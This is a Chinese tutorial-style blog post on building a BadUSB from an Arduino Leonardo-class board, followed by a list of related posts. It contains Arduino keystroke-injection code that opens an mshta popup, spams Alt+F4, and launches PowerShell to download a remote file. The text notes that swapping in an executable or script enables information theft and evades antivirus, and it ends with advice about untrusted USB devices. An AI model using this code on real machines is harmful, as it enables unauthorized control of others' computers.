简易BadUSB,攻击效果不简单
不久前,有小伙伴在实验室捡到一个U盘,想看看是谁的就插在了自己的电脑上,结果出现了安全软件的报毒通知……
也是因为这件事有了制作一个BadUSB的想法,可以在不被杀毒软件发现的情况下进行一些操作。
一、前期准备
Arduino:
这里使用的是BS Micro pro micro leonardo Arduino开发板。
Arduino IDE:
二、原理
BadUSB插入后会模拟键盘、鼠标对电脑进行操作,通过这些操作可以打开CMD或者Powershell并输入命令,通过这些命令可以进行简单操作或者更深一步从服务器下载文件执行。通过下载的.exe及.ps1等文件可以实现信息窃取、发送邮件等,从而达到控制目标机或者窃取信息等目的。
三、过程
(1)实现弹窗
关键代码:
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.print("mshtavbscript:msgbox(\"lalala\",64,\"lalalatitle\")(window.close)");
Keyboard.press(KEY_RETURN);
(2)关闭所有窗口
关键代码:
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
Keyboard.press(KEY_RETURN);
正常情况下是Alt+F4循环使用的效果是关闭所有窗口,但很大概率会出现自动关机的状况……
(3)从服务器端下载文件
关键代码:
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_ESC);
Keyboard.releaseAll();
Keyboard.print("powershell");
Keyboard.press(KEY_RETURN);
Keyboard.print("(new-objectSystem.Net.WebClient).DownloadFile('http://www.example.com/example.html','d:lalala.html')");
这里只是下载了一个命名为lalala.html的文件,如果下载一个可执行文件或者Powershell脚本可以做到更多的事!
因为BadUSB模仿的是键盘、鼠标操作,所以常规的安全软件、杀毒软件不能起作用,当然防范起来也很简单:只要不让不受你信任的USB插入你心爱的电脑就不存在安全问题。但是好奇心驱使下还是有很多人会将“捡到”的U盘插入自己的电脑看看是谁的U盘、里面有什么文件。看到这篇文章之后要对来路不明的USB设备多一点防备了。
简易BadUSB,攻击效果不简单相关推荐
- android 简易涂鸦板,canvas实现的简易涂鸦板效果
用canvas实现的简易涂鸦板效果,用鼠标点击在画布上随意涂鸦 涂鸦 *{ margin: 0; padding: 0; } #canvas1{ box-shadow: 0 5px 40px blac ...
- 『Kali nethunter系列』手机发起“badUSB”攻击(Rucky,Rucky脚本)
一个数据线,一个手机,动动手指拿下电脑控制权. 『Kali nethunter系列』手机发起"badUSB"攻击(Rucky,Rucky脚本) 当然不是只有nethunter的设备 ...
- 基于PaddlePaddle框架对CIFAR-100数据集在简易CNN(LeNet-5修改)和简易DNN的效果对比
CIFAR-100数据集在简易CNN(LeNet-5修改)和简易DNN的效果对比 项目说明 该项目为课程作业,实验过程等没有非常严谨,如有问题请指正,会及时改正! 摘要 本文对相同数据集使用简易线性神 ...
- Badusb 攻击之MacOSX系统实战
Badusb 已经出现了很多年,使用usb进行攻击的手段也从最初的利用autorun.inf.伪造文件夹名.快捷方式等手段转为更加难以防御的Badusb.这种攻击方式就是目前可绕过杀毒软件,防御较难. ...
- RPG游戏《黑暗之光》流程介绍与代码分析之(十五):主角受攻击效果以及场景切换
十五章:主角受攻击效果以及场景切换 本篇博客将<黑暗之光>开发的最后工作做完,包括之前未实现的主角被击效果,以及实际运行中的场景切换. 15.1 主角的受攻击效果 我们参照WolfBaby ...
- 使用kali nethunter执行badUSB攻击--基于Rucky工具
使用kali nethunter执行badUSB攻击–基于Rucky工具 1.下载工具 从F-Droid商店下载Rucky工具 2.攻击语言语法介绍 参考up主无序熵增进行整理:https://www ...
- 什么是BadUSB攻击以及如何预防
BadUSB 攻击是指 USB 设备存在内置固件漏洞,该漏洞允许自身伪装成人机接口设备.一旦连接到其目标计算机,BadUSB 就可以谨慎地执行有害命令或注入恶意负载. 一种常见的BadUSB攻击类型是 ...
- 基于ArduinoLeonardo板子的BadUSB攻击实战
0X00 前言 在Freebuf上许多同学已经对HID攻击谈了自己的看法,如维克斯同学的<利用Arduino快速制作Teensy BadUSB>无论从科普还是实践都给我们详尽的描述了Bad ...
- JS实现简易图片时钟效果
简易图片时钟 思路 1.首先创建一个div,在div中有6个img标签,分别代表时分秒. 2.通过dom操作获取这6个img标签. 3.通过new Date()获取时间,根据时间来修改图片的显示. 4 ...
最新文章
- rn 滑动验证_继卷轴屏之后,OPPO又展示一款“滑动”概念手机
- 拿来就能用!Dijkstra 算法实现快递路径优化
- WHAT THE DATA SAYS ABOUT KUBERNETES DEPLOYMENT PATTERNS
- QT的QPlaceContent类的使用
- 微信公众号开发之服务器接入指南之Java版本
- SQLServer无法使用特殊主体'sa'的解决
- 区块链软件公司:区块链技术的应用
- react和angualr动态插入带html标签或不带html标签的数据
- 新手学习Linux——搭建个人论坛
- 11-Container With Most Water
- qss之QRadioButton
- 浅谈文字编码和Unicode(下)
- Unity-之-物体旋转-跳跃-2021.5.13
- 网页排版布局常见问题有哪些?
- 阿里云 数据库mysql卸载安装,基本上所有坑全趟了
- matlab中利用快速傅里叶变换对股票价格进行频域分析
- 资深前端老司机到底牛逼在哪?
- 推荐一个有趣的Flash小游戏——FlashElementTD
- 张亚飞《.Net for Flash FMS》读后笔记一
- dbd mysql db_mysqlhotcopy备份时出现“DBD::mysql::db do faile\问题-huifeideluotuo-ChinaUnix博客...